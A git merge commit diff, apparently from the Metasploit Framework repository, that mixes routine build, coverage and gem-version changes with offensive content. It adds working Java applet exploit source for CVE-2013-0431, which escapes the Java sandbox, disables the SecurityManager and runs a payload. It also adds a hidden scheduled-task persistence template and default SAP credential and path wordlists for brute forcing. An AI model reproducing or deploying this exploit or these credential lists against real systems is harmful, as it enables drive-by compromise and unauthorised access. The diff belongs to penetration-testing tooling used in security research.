Merge branch 'master' into feature/http/authv2

2013-02-28 14:33:44 -06:00 · 2013-02-28 14:33:44 -06:00 · c290bc565e
parent c104fa6d97 8f58c7b25e
commit c290bc565e
160 changed files with 5519 additions and 396 deletions
--- a/.simplecov
+++ b/.simplecov
@ -0,0 +1,58 @@
+# RM_INFO is set when using Rubymine.  In Rubymine, starting SimpleCov is
+# controlled by running with coverage, so don't explicitly start coverage (and
+# therefore generate a report) when in Rubymine.  This _will_ generate a report
+# whenever `rake spec` is run.
+unless ENV['RM_INFO']
+	SimpleCov.start
+end
+
+SimpleCov.configure do
+  # ignore this file
+	add_filter '.simplecov'
+
+	#
+	# Changed Files in Git Group
+	# @see http://fredwu.me/post/35625566267/simplecov-test-coverage-for-changed-files-only
+	#
+
+	untracked = `git ls-files --exclude-standard --others`
+	unstaged = `git diff --name-only`
+	staged = `git diff --name-only --cached`
+	all = untracked + unstaged + staged
+	changed_filenames = all.split("\n")
+
+	add_group 'Changed' do |source_file|
+		changed_filenames.detect { |changed_filename|
+			source_file.filename.end_with?(changed_filename)
+		}
+	end
+
+	#
+	# Framework (msf) related groups
+	#
+
+	add_group 'Metasploit Framework', 'lib/msf'
+	add_group 'Metasploit Framework (Base)', 'lib/msf/base'
+	add_group 'Metasploit Framework (Core)', 'lib/msf/core'
+
+	#
+	# Other library groups
+	#
+
+	add_group 'Fastlib', 'lib/fastlib'
+	add_group 'Metasm', 'lib/metasm'
+	add_group 'PacketFu', 'lib/packetfu'
+	add_group 'Rex', 'lib/rex'
+	add_group 'RKelly', 'lib/rkelly'
+	add_group 'Ruby Mysql', 'lib/rbmysql'
+	add_group 'Ruby Postgres', 'lib/postgres'
+	add_group 'SNMP', 'lib/snmp'
+	add_group 'Zip', 'lib/zip'
+
+	#
+	# Specs are reported on to ensure that all examples are being run and all
+	# lets, befores, afters, etc are being used.
+	#
+
+	add_group 'Specs', 'spec'
+end
--- a/.travis.yml
+++ b/.travis.yml
@ -1,4 +1,8 @@
 language: ruby
+before_install:
+  - sudo apt-get update -qq
+  - sudo apt-get install -qq libpcap-dev
+
 rvm:
  #- '1.8.7'
  - '1.9.3'
--- a/data/exploits/cve-2013-0431/B.class
+++ b/data/exploits/cve-2013-0431/B.class
--- a/data/exploits/cve-2013-0431/Exploit.class
+++ b/data/exploits/cve-2013-0431/Exploit.class
--- a/data/exploits/cve-2013-0431/Exploit.ser
+++ b/data/exploits/cve-2013-0431/Exploit.ser
--- a/data/exploits/s4u_persistence.xml
+++ b/data/exploits/s4u_persistence.xml
@ -0,0 +1,50 @@
+<?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+  <RegistrationInfo>
+    <Date>DATEHERE</Date>
+    <Author>USERHERE</Author>
+  </RegistrationInfo>
+  <Triggers>
+    <TimeTrigger>
+      <Repetition>
+        <Interval>PT60M</Interval>
+        <StopAtDurationEnd>false</StopAtDurationEnd>
+      </Repetition>
+      <StartBoundary>DATEHERE</StartBoundary>
+      <Enabled>true</Enabled>
+    </TimeTrigger>
+  </Triggers>
+  <Principals>
+    <Principal id="Author">
+      <UserId>DOMAINHERE</UserId>
+      <LogonType>S4U</LogonType>
+      <RunLevel>LeastPrivilege</RunLevel>
+    </Principal>
+  </Principals>
+  <Settings>
+    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
+    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
+    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
+    <AllowHardTerminate>true</AllowHardTerminate>
+    <StartWhenAvailable>false</StartWhenAvailable>
+    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+    <IdleSettings>
+      <Duration>PT10M</Duration>
+      <WaitTimeout>PT1H</WaitTimeout>
+      <StopOnIdleEnd>true</StopOnIdleEnd>
+      <RestartOnIdle>false</RestartOnIdle>
+    </IdleSettings>
+    <AllowStartOnDemand>true</AllowStartOnDemand>
+    <Enabled>true</Enabled>
+    <Hidden>true</Hidden>
+    <RunOnlyIfIdle>false</RunOnlyIfIdle>
+    <WakeToRun>false</WakeToRun>
+    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
+    <Priority>7</Priority>
+  </Settings>
+  <Actions Context="Author">
+    <Exec>
+      <Command>COMMANDHERE</Command>
+    </Exec>
+  </Actions>
+</Task>
--- a/data/wordlists/sap_default.txt
+++ b/data/wordlists/sap_default.txt
@ -6,9 +6,14 @@ SAPCPIC ADMIN
 EARLYWATCH SUPPORT
 TMSADM PASSWORD
 TMSADM ADMIN
+TMSADM $1Pawd2&
 ADMIN welcome
 ADSUSER ch4ngeme
 ADS_AGENT ch4ngeme
 DEVELOPER ch4ngeme
 J2EE_ADMIN ch4ngeme
 SAPJSF ch4ngeme
+SAPR3 SAP
+CTB_ADMIN sap123
+XMI_DEMO sap123
+
--- a/data/wordlists/sap_icm_paths.txt
+++ b/data/wordlists/sap_icm_paths.txt
@ -116,6 +116,7 @@
 /sap/bc/bsp/sap/graph_bsp_test
 /sap/bc/bsp/sap/graph_bsp_test/Mimes
 /sap/bc/bsp/sap/gsbirp
+/sap/bc/bsp/sap/hrrcf_wd_dovru
 /sap/bc/bsp/sap/htmlb_samples
 /sap/bc/bsp/sap/iccmp_bp_cnfirm
 /sap/bc/bsp/sap/iccmp_hdr_cntnr
@ -124,6 +125,9 @@
 /sap/bc/bsp/sap/iccmp_ssc_ll/
 /sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/it00
+/sap/bc/bsp/sap/it00/default.htm
+/sap/bc/bsp/sap/it00/http_client.htm
+/sap/bc/bsp/sap/it00/http_client_xml.htm
 /sap/bc/bsp/sap/public/bc
 /sap/bc/bsp/sap/public/graphics
 /sap/bc/bsp/sap/sam_demo
@ -141,6 +145,17 @@
 /sap/bc/bsp/sap/xmb_bsp_log
 /sap/bc/contentserver
 /sap/bc/echo
+/sap/bc/erecruiting/applwzd
+/sap/bc/erecruiting/confirmation_e
+/sap/bc/erecruiting/confirmation_i
+/sap/bc/erecruiting/dataoverview
+/sap/bc/erecruiting/password
+/sap/bc/erecruiting/posting_apply
+/sap/bc/erecruiting/qa_email_e
+/sap/bc/erecruiting/qa_email_i
+/sap/bc/erecruiting/registration
+/sap/bc/erecruiting/startpage
+/sap/bc/erecruiting/verification
 /sap/bc/error
 /sap/bc/FormToRfc
 /sap/bc/graphics/net
@ -169,6 +184,32 @@
 /sap/bc/webdynpro/sap/esh_adm_smoketest_ui
 /sap/bc/webdynpro/sap/esh_eng_modelling
 /sap/bc/webdynpro/sap/esh_search_results.ui
+/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
+/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_ext
+/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_int
+/sap/bc/webdynpro/sap/hrrcf_a_appls
+/sap/bc/webdynpro/sap/hrrcf_a_applwizard
+/sap/bc/webdynpro/sap/hrrcf_a_candidate_registration
+/sap/bc/webdynpro/sap/hrrcf_a_candidate_verification
+/sap/bc/webdynpro/sap/hrrcf_a_dataoverview
+/sap/bc/webdynpro/sap/hrrcf_a_draft_applications
+/sap/bc/webdynpro/sap/hrrcf_a_new_verif_mail
+/sap/bc/webdynpro/sap/hrrcf_a_posting_apply
+/sap/bc/webdynpro/sap/hrrcf_a_psett_ext
+/sap/bc/webdynpro/sap/hrrcf_a_psett_int
+/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_extern
+/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_intern
+/sap/bc/webdynpro/sap/hrrcf_a_qa_mss
+/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch
+/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch_int
+/sap/bc/webdynpro/sap/hrrcf_a_req_assess
+/sap/bc/webdynpro/sap/hrrcf_a_requi_monitor
+/sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
+/sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
+/sap/bc/webdynpro/sap/hrrcf_a_tp_assess
+/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
+/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
+/sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
 /sap/bc/webdynpro/sap/sh_adm_smoketest_files
 /sap/bc/webdynpro/sap/wd_analyze_config_appl
 /sap/bc/webdynpro/sap/wd_analyze_config_comp
@ -196,9 +237,10 @@
 /sapmc/sapmc.html
 /sap/monitoring/
 /sap/public/bc
-/sap/public/bc                                                                    
 /sap/public/bc/icons
 /sap/public/bc/icons_rtl
+/sap/public/bc/its
+/sap/public/bc/its/designs
 /sap/public/bc/its/mimes
 /sap/public/bc/its/mimes/system/SL/page/hourglass.html
 /sap/public/bc/its/mobile/itsmobile00
@ -213,6 +255,7 @@
 /sap/public/bc/trex
 /sap/public/bc/ur
 /sap/public/bc/wdtracetool
+/sap/public/bc/webdynpro
 /sap/public/bc/webdynpro/adobechallenge
 /sap/public/bc/webdynpro/mimes
 /sap/public/bc/webdynpro/ssr
@ -220,6 +263,7 @@
 /sap/public/bc/webicons
 /sap/public/bc/workflow
 /sap/public/bc/workflow/shortcut
+/sap/public/bsp
 /sap/public/bsp/sap
 /sap/public/bsp/sap/htmlb
 /sap/public/bsp/sap/public
--- a/external/source/exploits/cve-2013-0431/B.java
+++ b/external/source/exploits/cve-2013-0431/B.java
@ -0,0 +1,19 @@
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class B
+  implements PrivilegedExceptionAction
+{
+  public B()
+  {
+    try
+    {
+      AccessController.doPrivileged(this); } catch (Exception e) {
+    }
+  }
+
+  public Object run() {
+    System.setSecurityManager(null);
+    return new Object();
+  }
+}
--- a/external/source/exploits/cve-2013-0431/Exploit.java
+++ b/external/source/exploits/cve-2013-0431/Exploit.java
@ -0,0 +1,93 @@
+/*
+*   From Paunch with love (Java 1.7.0_11 Exploit)
+*
+*   Deobfuscated from Cool EK by SecurityObscurity
+*
+*   https://twitter.com/SecObscurity
+*/
+import java.applet.Applet;
+import com.sun.jmx.mbeanserver.Introspector;
+import com.sun.jmx.mbeanserver.JmxMBeanServer;
+import com.sun.jmx.mbeanserver.MBeanInstantiator;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles.Lookup;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+import javax.management.ReflectionException;
+import java.io.*;
+import metasploit.Payload;
+
+public class Exploit extends Applet
+{
+
+  public void init()
+  {
+
+    try
+    {
+           int length;
+           byte[] buffer = new byte[5000];
+           ByteArrayOutputStream os = new ByteArrayOutputStream();
+
+           // read in the class file from the jar
+           InputStream is = getClass().getResourceAsStream("B.class");
+
+           // and write it out to the byte array stream
+           while( ( length = is.read( buffer ) ) > 0 )
+               os.write( buffer, 0, length );
+
+           // convert it to a simple byte array
+           buffer = os.toByteArray();
+
+          Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");
+
+          Method method = getMethod(class1, "enter", true);
+          Object obj = method.invoke(null, new Object[0]);
+          Method method1 = getMethod(class1, "createClassLoader", false);
+          Object obj1 = method1.invoke(obj, new Object[1]);
+
+          Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
+          Method method2 = getMethod(class2, "defineClass", false);
+
+          Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
+          my_class.newInstance();
+
+          Payload.main(null);
+
+    }
+    catch (Throwable localThrowable){}
+
+  }
+
+
+   private Method getMethod(Class class1, String s, boolean flag)
+  {
+    try {
+      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
+      Method[] amethod1 = amethod;
+
+      for (int i = 0; i < amethod1.length; i++) {
+        Method method = amethod1[i];
+        String s1 = method.getName();
+        Class[] aclass = method.getParameterTypes();
+        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
+      }
+    } catch (Exception localException) {  }
+
+    return null;
+  }
+
+  private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
+  {
+    Object obj = null;
+    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
+    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
+
+    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
+    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
+    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
+  }
+
+}
+
--- a/external/source/exploits/cve-2013-0431/Makefile
+++ b/external/source/exploits/cve-2013-0431/Makefile
@ -0,0 +1,22 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+	Exploit.java  \
+	B.java \
+	Serializer.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java:." $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	java Serializer
+	mv Exploit.class ../../../../data/exploits/cve-2013-0431/
+	mv B.class ../../../../data/exploits/cve-2013-0431/
+	mv Exploit.ser ../../../../data/exploits/cve-2013-0431/
+
+clean:
+	rm -rf *.class
+	rm -rf *.ser
--- a/external/source/exploits/cve-2013-0431/Serializer.java
+++ b/external/source/exploits/cve-2013-0431/Serializer.java
@ -0,0 +1,20 @@
+import java.io.*;
+
+public class Serializer {
+
+    public static void main(String [ ] args)
+    {
+        try {
+            Exploit b=new Exploit(); // target Applet instance
+            ByteArrayOutputStream baos=new ByteArrayOutputStream();
+            ObjectOutputStream oos=new ObjectOutputStream(baos);
+            oos.writeObject(b);
+            FileOutputStream fos=new FileOutputStream("Exploit.ser");
+            fos.write(baos.toByteArray());
+            fos.close();
+        } catch (Exception ex) {
+            ex.printStackTrace();
+        }
+    }
+
+}
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb
@ -1,8 +0,0 @@
-class Mdm::CredFile < ActiveRecord::Base
-  #
-  # Relations
-  #
-  belongs_to :workspace, :class_name => 'Mdm::Workspace'
-
-  ActiveSupport.run_load_hooks(:mdm_cred_file, self)
-end
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE
@ -1,4 +1,4 @@
-Copyright (C) 2012, Rapid7 LLC
+Copyright (C) 2012, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb
@ -15,7 +15,6 @@ class Mdm::Workspace < ActiveRecord::Base
  # Relations
  #

-  has_many :cred_files, :dependent => :destroy, :class_name => 'Mdm::CredFile'
  has_many :creds, :through => :services, :class_name => 'Mdm::Cred'
  has_many :events, :class_name => 'Mdm::Event'
  has_many :hosts, :dependent => :destroy, :class_name => 'Mdm::Host'
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb
@ -3,5 +3,5 @@ module MetasploitDataModels
  # is considered unstable because the database migrations are still in metasploit-framework and certain models may not
  # be shared between metasploit-framework and pro, so models may be removed in the future.  Because of the unstable API
  # the version should remain below 1.0.0
-  VERSION = '0.3.0'
+  VERSION = '0.4.0'
 end
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec
@ -19,7 +19,7 @@ Gem::Specification.new do |s|
  # ---- Dependencies ----
  s.add_development_dependency 'rake'

-  s.add_runtime_dependency 'activerecord'
+  s.add_runtime_dependency 'activerecord', '>= 3.2.10'
  s.add_runtime_dependency 'activesupport'
  s.add_runtime_dependency 'pg'
  s.add_runtime_dependency 'pry'
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails
